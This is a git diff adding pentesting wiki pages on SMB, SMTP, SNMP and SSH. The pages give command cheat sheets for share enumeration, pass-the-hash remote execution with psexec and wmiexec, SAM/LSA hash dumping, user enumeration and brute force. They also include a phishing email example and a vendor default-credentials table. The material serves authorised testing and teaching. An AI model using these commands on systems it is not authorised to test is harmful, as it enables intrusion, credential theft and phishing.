+| lookupnames | LSARPC | Look up usernames to SID[a](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn8) values |
+| lookupsids | Look up SIDs to usernames \(RID[b](https://learning.oreilly.com/library/view/network-security-assessment/9781491911044/ch08.html#ch08fn9) cycling\) |  |
+| lsaaddacctrights | Add rights to a user account |  |
+| lsaremoveacctrights | Remove rights from a user account |  |
+| dsroledominfo | LSARPC-DS | Get primary domain information |
+| dsenumdomtrusts | Enumerate trusted domains within an AD forest |  |
+
+To **understand** better how the tools _**samrdump**_ **and** _**rpcdump**_ works you should read [**Pentesting MSRPC**](135-penstesting-msrpc.md).
+
+### List shared folders
+
+It is always recommended to look if you can access to anything, if you don't have credentials try using **null** **credentials/guest user**.
+
+```bash
+smbclient --no-pass -L //<IP> # Null user
+smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
+smbmap -H <IP> [-P <PORT>] #Null user
+smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
+smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
+crackmapexec smb <IP> -u '' -p '' --shares #Null user
+crackmapexec smb <IP> -u 'username' -p 'password' --shares #Guest user
+```
+
+### **Connect/List a shared folder**
+
+```bash
+#Connect using smbclient
+smbclient --no-pass //<IP>/<Folder>
+smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
+#Use --no-pass -c 'recurse;ls'  to list recursively with smbclient
+
+#List with smbmap, without folder it list everything
+smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
+smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
+smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
+```
+
+### Mount a shared folder
+
+```bash
+mount -t cifs -o username=user,password=password //x.x.x.x/share /mnt/share
+```
+
+### **Download files**
+
+Read previous sections to learn how to connect with credentials/Pass-the-Hash.
+
+```bash
+#Search a file and download
+sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
+```
+
+```bash
+#Download all
+smbclient //<IP>/<share>
+> recurse ON
+> prompt OFF
+> mget *
+#Download everything to current directory
+```
+
+## Authenticate using Kerberos
+
+You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**:
+
+```bash
+smbclient --kerberos //ws01win10.domain.com/C$
+rpcclient -k ws01win10.domain.com
+```
+
+## **Execute**
+
+### **crackmapexec**
+
+```bash
+apt-get install crackmapexec
+
+crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' #Execute Powershell
+crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami #Excute cmd
+crackmapexec 192.168.10.11 -u Administrator -H <NTHASH> -x whoami #Pass-the-Hash
+# Using --exec-method -1,2,3 wmiexec,atexec,smbexec
+
+crackmapexec -d <DOMAIN> -u Administrator -p 'password' --sam #Dump SAM
+crackmapexec -d <DOMAIN> -u Administrator -p 'password' --lsa #Dump LSASS in memmory hashes
+```
+
+### \*\*\*\*[**psexec**](../windows/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows/ntlm/smbexec.md)\*\*\*\*
+
+Both options will **create a new service** \(using _\pipe\svcctl_ via SMB\) in the victim machine and use it to **execute something** \(**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-\).  
+**More info** about [**psexec** ](../windows/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows/ntlm/smbexec.md).  
+In **kali** it is located on /usr/share/doc/python3-impacket/examples/
+
+```bash
+#If no password is provided, it will be prompted
+./psexec.py [[domain/]username[:password]@]<targetName or address>
+./psexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
+psexec \\192.168.122.66 -u Administrator -p 123456Ww
+psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
+```
+
+Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
+
+### [wmiexec](../windows/ntlm/wmicexec.md)/dcomexec
+
+Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**  
+In **kali** it is located on /usr/share/doc/python3-impacket/examples/
+
+```bash
+#If no password is provided, it will be prompted
+./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
+./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
+#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
+```
+
+Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
+
+```bash
+#If no password is provided, it will be prompted
+./dcomexec.py [[domain/]username[:password]@]<targetName or address>
+./dcomexec.py -hashes <LM:NT> administrator@10.10.10.103 #Pass-the-Hash
+#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
+```
+
+### [AtExec](../windows/ntlm/atexec.md)
+
+Execute commands via the Task Scheduler \(using _\pipe\atsvc_ via SMB\).  
+In **kali** it is located on /usr/share/doc/python3-impacket/examples/
+
+```bash
+./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
+./atexec.py -hashes <LM:NT> administrator@10.10.10.175 "whoami"
+```
+
+## Impacket reference
+
+[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
+
+## **Bruteforce users credentials**
+
+**This is not recommended, you could block an account if you exceed the maximum allowed tries**
+
+```bash
+nmap --script smb-brute -p 445 <IP>
+ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce eachusername
+```
+
+## SMB relay attack
+
+This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.  
+[**More information about this attack here.**](pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)\*\*\*\*
+
+## SMB-Trap
+
+The Windows library URLMon.dll automatically try to authenticaticate to the host when a page tries to access some contect via SMB, for example: `img src="\\10.10.10.10\path\image.jpg"`
+
+This happens with the funcions:
+
+* URLDownloadToFile
+* URLDownloadToCache
+* URLOpenStream
+* URLOpenBlockingStream
+
+Which are used by some browsers and tools \(like Skype\)
+
+![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](../.gitbook/assets/image%20%28273%29.png)
+
+### SMBTrap using MitMf
+
+![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](../.gitbook/assets/image%20%28116%29.png)
+
+
+
diff --git a/pentesting/pentesting-smtp/README.md b/pentesting/pentesting-smtp/README.md
new file mode 100644
index 00000000..b5ccccc7
--- /dev/null
+++ b/pentesting/pentesting-smtp/README.md
@@ -0,0 +1,258 @@
+# 25,465,587 - Pentesting SMTP/s
+
+## **Basic Information**
+
+**SMTP \(Simple Mail Transfer Protocol\)** is a TCP/IP protocol used in **sending** and receiving **e-mail**. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.
+
+In other words, **users typically use** a program that uses **SMTP for sending e-mail** and either **POP3 or IMAP for receiving** e-mail. On Unix-based systems, **sendmail** is the most widely-used SMTP server for e-mail. A commercial package, Sendmail, includes a POP3 server. **Microsoft Exchange** includes an SMTP server and can also be set up to include POP3 support.  
+From [here](https://whatis.techtarget.com/definition/SMTP-Simple-Mail-Transfer-Protocol).
+
+**Default port:** 25,465\(ssl\),587\(ssl\)
+
+```text
+PORT   STATE SERVICE REASON  VERSION
+25/tcp open  smtp    syn-ack Microsoft ESMTP 6.0.3790.3959
+```
+
+### EMAIL Headers
+
+If you have the opportunity to **make the victim send you a emai**l \(via contact form of the web page for example\), do it because **you could learn about the internal topology** of the victim seeing the headers of the mail.
+
+You can also get an email from a SMTP server trying to **send to that server an email to a non-existent address** \(because the server will send to the attacker a NDN mail\). But, be sure that you send the email from an allowed address \(check the SPF policy\) and that you can receive NDN messages.
+
+You should also try to **send different contents because you can find more interesting information** on the headers like: `X-Virus-Scanned: by av.domain.com`   
+You should send the EICAR test file.  
+Detecting the **AV** may allow you to exploit **known vulnerabilities.**
+
+## Basic actions
+
+### **Banner Grabbing/Basic connection**
+
+**SMTP:**
+
+```bash
+nc -vn <IP> 25
+```
+
+**SMTPS**:
+
+```bash
+openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
+```
+
+### Finding MX servers of an organisation
+
+```bash
+dig +short mx google.com
+```
+
+### Enumeration
+
+```bash
+nmap -p25 --script smtp-commands 10.10.10.10
+```
+
+### NTLM Auth - Information disclosure
+
+If the server supports NTLM auth \(Windows\) you can obtain sensitive info \(versions\). More info [**here**](https://medium.com/@m8r0wn/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666).
+
+```bash
+root@kali: telnet example.com 587 
+220 example.com SMTP Server Banner 
+>> HELO 
+250 example.com Hello [x.x.x.x] 
+>> AUTH NTLM 334 
+NTLM supported 
+>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= 
+334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
+```
+
+Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
+
+### Sniffing
+
+Check if you sniff some password from the packets to port 25
+
+### [Auth bruteforce](../../brute-force.md#smtp)
+
+## Username Bruteforce Enumeration
+
+**Authentication is not always needed**
+
+### RCPT TO
+
+```bash
+$ telnet 10.0.10.1 25
+Trying 10.0.10.1...
+Connected to 10.0.10.1.
+Escape character is '^]'.
+220 myhost ESMTP Sendmail 8.9.3
+HELO x
+250 myhost Hello [10.0.0.99], pleased to meet you
+MAIL FROM:test@test.org
+250 2.1.0 test@test.org... Sender ok
+RCPT TO:test
+550 5.1.1 test... User unknown
+RCPT TO:admin
+550 5.1.1 admin... User unknown
+RCPT TO:ed
+250 2.1.5 ed... Recipient ok
+```
+
+### VRFY
+
+```text
+$ telnet 10.0.0.1 25
+Trying 10.0.0.1...
+Connected to 10.0.0.1.
+Escape character is '^]'.
+220 myhost ESMTP Sendmail 8.9.3
+HELO
+501 HELO requires domain address
+HELO x
+250 myhost Hello [10.0.0.99], pleased to meet you
+VRFY root
+250 Super-User <root@myhost>
+VRFY blah
+550 blah... User unknown
+```
+
+### EXPN
+
+```text
+$ telnet 10.0.10.1 25
+Trying 10.0.10.1...
+Connected to 10.0.10.1.
+Escape character is '^]'.
+220 myhost ESMTP Sendmail 8.9.3
+HELO
+501 HELO requires domain address
+HELO x
+EXPN test
+550 5.1.1 test... User unknown
+EXPN root
+250 2.1.5 <ed.williams@myhost>
+EXPN sshd
+250 2.1.5 sshd privsep <sshd@mail2>
+```
+
+Extracted from: [https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/june/username-enumeration-techniques-and-their-value/](https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/june/username-enumeration-techniques-and-their-value/)
+
+### Automatic tools
+
+```text
+Metasploit: auxiliary/scanner/smtp/smtp_enum
+smtp-user-enum
+nmap –script smtp-enum-users.nse <IP>
+```
+
+## DSN Reports
+
+**Delivery Status Notification Reports**: If you send an **email** to an organisation to an **invalid address**, the organisation will notify that the address was invalided sending a **mail back to you**. **Headers** of the returned email will **contain** possible **sensitive information** \(like IP address of the mail services that interacted with the reports or anti-virus software info\).
+
+## [Commands](smtp-commands.md)
+
+## Send Email from linux console
+
+```text
+root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf
+Reading message body from STDIN because the '-m' option was not used.
+If you are manually typing in a message:
+  - First line must be received within 60 seconds.
+  - End manual input with a CTRL-D on its own line.
+
+IT Dept,
+
+We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.
+
+Sincerely,
+```
+
+From: [https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/](https://www.offensive-security.com/metasploit-unleashed/client-side-exploits/)
+
+## Mail Spoofing
+
+Most of this section was extracted from the book **Network Security Assessment 3rd Edition**.
+
+SMTP messages are easily spoofed, and so organizations use **SPF**, **DKIM**, and **DMARC** features to prevent parties from sending unauthorised email.
+
+A **complete guide of these countermeasures** can be found in [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/)
+
+### SPF
+
+Sender Policy Framework \(SPF\) provides a mechanism that allows MTAs to check of ahost sending an email is authorized.  
+Then, the organisations can define a list of authorised mail servers and the MTAs can query for this lists to check if the email was spoofed or not.
+
+```text
+cpolo@DESKTOP-RVEHVKS:~$ dig txt google.com | grep spf
+google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"
+cpolo@DESKTOP-RVEHVKS:~$ dig txt _spf.google.com | grep spf
+; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
+;_spf.google.com.               IN      TXT
+_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"
+cpolo@DESKTOP-RVEHVKS:~$ dig txt _netblocks.google.com | grep spf
+_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"
+cpolo@DESKTOP-RVEHVKS:~$ dig txt _netblocks2.google.com | grep spf
+_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"
+cpolo@DESKTOP-RVEHVKS:~$ dig txt _netblocks3.google.com | grep spf
+_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"
+```
+
+To check the SPF of a domain you can use online tools like: [https://www.kitterman.com/spf/validate.html](https://www.kitterman.com/spf/validate.html)  
+ If you get _**No valid SPF record**_ you probably can send an email using that domain.
+
+**Use checkdmarc to check the SPF record:** [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/)\*\*\*\*
+
+### DKIM
+
+DomainKeys Identified Mail \(DKIM\) is a mechanism by which **outbound email is signed and validated by foreign MTAs upon retrieving a domain’s public key via DNS**. The DKIM public key is held within a TXT record for a domain; however, you must know both the selector and domain name to retrieve it.
+
+Then, to ask for the key you need the domain name and the selector of the mail from the mail header `DKIM-Signature` for example: `d=gmail.com;s=20120113`
+
+```text
+dig 20120113._domainkey.gmail.com TXT | grep p=
+20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCg
+KCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3
+```
+
+### DMARC
+
+Domain-based Message Authentication, Reporting & Conformance \(DMARC\) is a method of mail authentication that expands upon SPF and DKIM. Policies instruct mail servers how to process email for a given domain and report upon actions performed.
+
+![](../../.gitbook/assets/image%20%28186%29.png)
+
+**To obtain the DMARC record, you need to query the subdomain \_dmarc**
+
+```text
+root@kali:~# dig _dmarc.yahoo.com txt | grep DMARC
+_dmarc.yahoo.com.  1785 IN TXT "v=DMARC1\; p=reject\; sp=none\; pct=100\; 
+rua=mailto:dmarc-yahoo-rua@yahoo-inc.com, mailto:dmarc_y_rua@yahoo.com\;"
+root@kali:~# dig _dmarc.google.com txt | grep DMARC
+_dmarc.google.com. 600 IN TXT "v=DMARC1\; p=quarantine\; rua=mailto:mailauth-reports@google.com"
+root@kali:~# dig _dmarc.paypal.com txt | grep DMARC
+_dmarc.paypal.com. 300 IN TXT "v=DMARC1\; p=reject\; rua=mailto:d@rua.agari.com\; 
+ruf=mailto:dk@bounce.paypal.com,mailto:d@ruf.agari.com"
+
+```
+
+PayPal and Yahoo instruct mail servers to reject messages that contain invalid DKIM signatures or do not originate from their networks. Notifications are then sent to the respective email addresses within each organization. Google is configured in a similar way, although it instructs mail servers to quarantine messages and not outright reject them.
+
+**Use checkdmarc to check the DMARC record:** [**https://pypi.org/project/checkdmarc/**](https://pypi.org/project/checkdmarc/)\*\*\*\*
+
+### **Tools**
+
+You can attack some **characteristics** of **mail clients** to make the user think that the **mail** is **coming** from **any address**, more info: [**https://www.mailsploit.com/index**](https://www.mailsploit.com/index) ****
+
+## Exfiltration through SMTP
+
+**If you can send data via SMTP** [**read this**](../../exfiltration.md#smtp)**.**
+
+## Config file
+
+```text
+sendmail.cf
+submit.cf
+```
+
+
+
diff --git a/pentesting/pentesting-smtp/smtp-commands.md b/pentesting/pentesting-smtp/smtp-commands.md
new file mode 100644
index 00000000..b4907b38
--- /dev/null
+++ b/pentesting/pentesting-smtp/smtp-commands.md
@@ -0,0 +1,43 @@
+# SMTP - Commands
+
+**Extracted from:** [**https://serversmtp.com/smtp-commands/**](https://serversmtp.com/smtp-commands/)\*\*\*\*
+
+**HELO**  
+It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.
+
+**EHLO**  
+An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.
+
+**MAIL FROM**  
+With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.
+
+**RCPT TO**  
+It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.
+
+**SIZE**  
+This SMTP command informs the remote server about the estimated size \(in terms of bytes\) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
+
+**DATA**  
+With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
+
+**VRFY**  
+The server is asked to verify whether a particular email address or username actually exists.
+
+**TURN**  
+This command is used to invert roles between the client and the server, without the need to run a new connaction.
+
+**AUTH**  
+With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.
+
+**RSET**  
+It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed \(like in the case of QUIT\).
+
+**EXPN**  
+This SMTP command asks for a confirmation about the identification of a mailing list.
+
+**HELP**  
+It’s a client’s request for some information that can be useful for the a successful transfer of the email.
+
+**QUIT**  
+It terminates the SMTP conversation.
+
diff --git a/pentesting/pentesting-snmp.md b/pentesting/pentesting-snmp.md
new file mode 100644
index 00000000..8b9dc646
--- /dev/null
+++ b/pentesting/pentesting-snmp.md
@@ -0,0 +1,176 @@
+# 161,162,10161,10162/udp - Pentesting SNMP
+
+## S**NMP - Explained**
+
+**SNMP - Simple Network Management Protocol** is a protocol used to monitor different devices in the network \(like routers, switches, printers, IoTs...\).
+
+```text
+PORT    STATE SERVICE REASON                 VERSION
+161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)
+```
+
+### MIB
+
+**MIB** stands for **M**anagement **I**nformation **B**ase and is a **collection of information organized hierarchically**. These are **accessed using** a protocol such as **SNMP**. There are two types of MIBs: **scalar** and **tabular**.  
+Scalar objects define a single object instance whereas tabular objects define multiple related object instances grouped in MIB tables.
+
+### OIDs
+
+**OIDs** stands for **O**bject **Id**entifiers. **OIDs uniquely identify managed objects in a MIB hierarchy**. This can be depicted as a tree, the levels of which are assigned by different organizations. Top level MIB object IDs \(OIDs\) belong to different standard organizations.  
+**Vendors define private branches including managed objects for their own products.**
+
+![](../.gitbook/assets/snmp_oid_mib_tree.png)
+
+You can **navigate** through an **OID tree** from the web here: [http://www.oid-info.com/cgi-bin/display?tree=\#focus](http://www.oid-info.com/cgi-bin/display?tree=#focus) or **see what a OID means** \(like `1.3.6.1.2.1.1`\) accessing [http://oid-info.com/get/1.3.6.1.2.1.1](http://oid-info.com/get/1.3.6.1.2.1.1).  
+There are some **well-known OIDs** like the ones inside [1.3.6.1.2.1](http://oid-info.com/get/1.3.6.1.2.1) that references MIB-2 defined Simple Network Management Protocol \(SNMP\) variables. And from the **OIDs pending from this one** you can obtain some interesting host data \(system data, network data, processes data...\)
+
+### **OID Example**
+
+**`1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7`**
+
+Here is a breakdown of this address.
+
+* 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”
+* 3 – this is called ORG and it is used to specify the organization that built the device.
+* 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.
+* 1 – this is the value of the internet to denote that all communications will happen through the Internet.
+* 4 – this value determines that this device is made by a private organization and not a government one.
+* 1 – this value denotes that the device is made by an enterprise or a business entity.
+
+These first six values tend to be the same for all devices and they give you the basic information about them. This sequence of numbers will be the same for all OIDs, except when the device is made by the government.
+
+Moving on to the next set of numbers. 
+
+* 1452 – gives the name of the organization that manufactured this device.
+* 1 – explains the type of device. In this case, it is an alarm clock.
+* 2 – determines that this device is a remote terminal unit.
+
+The rest of the values give specific information about the device.
+
+* 5 – denotes a discrete alarm point.
+* 1 – specific point in the device
+* 3 – port
+* 21 – address of the port
+* 1 – display for the port
+* 4 – point number
+* 7 – state of the point
+
+_**\(Example take from**_ [_**here**_](https://www.netadmintools.com/snmp-mib-and-oids)_**\)**_
+
+### SNMP Versions
+
+There are 2 important versions of SNMP:
+
+* **SNMPv1**: Main one, it is still the most frequent, the **authentication is based on a string** \(community string\) that travels in **plain-text** \(all the information travels in plain text\). **Version 2 and 2c** send the **traffic in plain text** also and uses a **community string as authentication**.
+* **SNMPv3**: Uses a better authentication form and the information travels **encrypted** using \(**dictionary attack** could be performed but would be much harder to find the correct creds that inn SNMPv1 and v2\).
+
+### Community Strings
+
+As mentioned before, **in order to access the information saved on the MIB you need to know the community string on versions 1 and 2/2c and the credentials on version 3.**  
+The are **2 types of community strings**: 
+
+* **`public`** mainly **read only** functions 
+* **`private`** **Read/Write** in general
+
+Note that **the writability of an OID depends on the community string used**, so **even** if you find that "**public**" is being used, you could be able to **write some values.** Also, there **may** exist objects which are **always "Read Only".**  
+If you try to **write** an object a **`noSuchName` or `readOnly` error** is received**.**
+
+In versions 1 and 2/2c if you to use a **bad** community string the server wont **respond**. So, if it responds, a **valid community strings was used**.
+
+## Ports
+
+*   The SNMP agent receives requests on UDP port **161**.
+*   The manager receives notifications \([Traps](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#Trap) and [InformRequests](https://en.wikipedia.org/wiki/Simple_Network_Management_Protocol#InformRequest)\) on port **162**.
+*  When used with [Transport Layer Security](https://en.wikipedia.org/wiki/Transport_Layer_Security) or [Datagram Transport Layer Security](https://en.wikipedia.org/wiki/Datagram_Transport_Layer_Security), requests are received on port **10161** and notifications are sent to port **10162**.
+
+## Brute-Force Community String \(v1 and v2c\)
+
+To **guess the community string** you could perform a dictionary attack. Check [here different ways to perform a brute-force attack against SNMP](../brute-force.md#snmp).
+
+## Enumerating SNMP
+
+If you know a valid community string, you can access the data using **SNMPWalk** or **SNMP-Check**:
+
+```bash
+snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
+snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
+snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
+nmap --script "snmp* and not snmp-brute" <target>
+```
+
+To see whats does **means** each OID gathered from the device, it is recommended to **install**:
+
+```bash
+apt-get install snmp-mibs-downloader
+download-mibs
+```
+
+And **in** _**/etc/snmp/snmp.conf**_ **comment the line "mibs :"**
+
+**It is recommended to install and configure this before launching any SNMP enumeration.**
+
+**SNMP** has a lot of information about the host and things that you may find interesting are: **Network interfaces** \(IPv4 and **IPv6** address\) and **processes running** \(may contain passwords\)....
+
+## **Massive SNMP**
+
+[Braa ](https://github.com/mteg/braa)is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
+
+Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
+
+**Syntax:** braa \[Community-string\]@\[IP of SNMP server\]:\[iso id\]
+
+```text
+braa ignite123@192.168.1.125:.1.3.6.*
+```
+
+This can extract a lot MB of information that you cannot process manually.
+
+So, lets look for the most interesting information \(from [https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/](https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/)\):
+
+### Devices
+
+One of the first things I do is extract the sysDesc .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:
+
+```text
+grep ".1.3.6.1.2.1.1.1.0" *.snmp
+```
+
+### Identify private string
+
+As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP Trap data. So again, using the following grep we can parse through a lot of MIB data quickly searching for the key word of “trap”:
+
+```bash
+grep -i "trap" *.snmp
+```
+
+### Usernames/passwords
+
+Another area of interest is logs, I have discovered that there are some devices that hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for key words such as _fail_, _failed_ or _login_ and examine that data to see if there is anything of value.
+
+```bash
+grep -i "login\|fail" *.snmp
+```
+
+### Emails
+
+```bash
+grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
+```
+
+## Modifying SNMP values
+
+You can use _**NetScanTools**_ to **modify values**. You will need to know the **private string** in order to do so.
+
+## Spoofing
+
+If there is an ACL that only allows some IPs to query the SMNP service, you can spoof one of this addresses inside the UDP packet an sniff the traffic. 
+
+## Examine SNMP Configuration files
+
+* snmp.conf
+* snmpd.conf
+* snmp-config.xml
+
+  
+
+
diff --git a/pentesting/pentesting-ssh.md b/pentesting/pentesting-ssh.md
new file mode 100644
index 00000000..8e8ee2bc
--- /dev/null
+++ b/pentesting/pentesting-ssh.md
@@ -0,0 +1,130 @@
+# 22 - Pentesting SSH/SFTP
+
+## B**asic Information**
+
+**SSH or Secure Shell or Secure Socket Shell,** is a network protocol that gives users a **secure way to access a computer over an unsecured network.**
+
+**Default port:** 22
+
+```text
+22/tcp open  ssh     syn-ack
+```
+
+## **Enumeration**
+
+### **Banner Grabbing**
+
+```bash
+nc -vn <IP> 22
+```
+
+### Public SSH key of server
+
+```bash
+ssh-keyscan -t rsa <IP> -p <PORT>
+```
+
+### Weak Cipher Algorithms
+
+This is discovered by default by **nmap**. But you can also use **sslcan** or **sslyze**.
+
+### Shodan
+
+* `ssh`
+
+## Brute force usernames, passwords and private keys
+
+### Username Enumeration
+
+In some versions of OpenSSH you can make a timing attack to enumerate users. You can use a metasploit module in order to exploit this:
+
+```text
+msf> use scanner/ssh/ssh_enumusers
+```
+
+### [Brute force](../brute-force.md#ssh)
+
+Some common ssh credentials [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) and below.
+
+### Private/Public Keys BF
+
+If you know some ssh private key that could be used... lets try it. You can use the nmap script:
+
+```text
+https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
+```
+
+Or the MSF auxiliary module:
+
+```text
+msf> use scanner/ssh/ssh_identify_pubkeys
+```
+
+#### Known badkeys can be found here:
+
+{% embed url="https://github.com/rapid7/ssh-badkeys/tree/master/authorized" %}
+
+You should look here in order to search for valid keys for the victim machine.
+
+## Default Credentials
+
+| **Vendor** | **Usernames** | **Passwords** |
+| :--- | :--- | :--- |
+| APC | apc, device | apc |
+| Brocade | admin | admin123, password, brocade, fibranne |
+| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change\_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
+| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
+| D-Link | admin, user | private, admin, user |
+| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
+| EMC | admin, root, sysadmin | EMCPMAdm7n, Password\#1, Password123\#, sysadmin, changeme, emc |
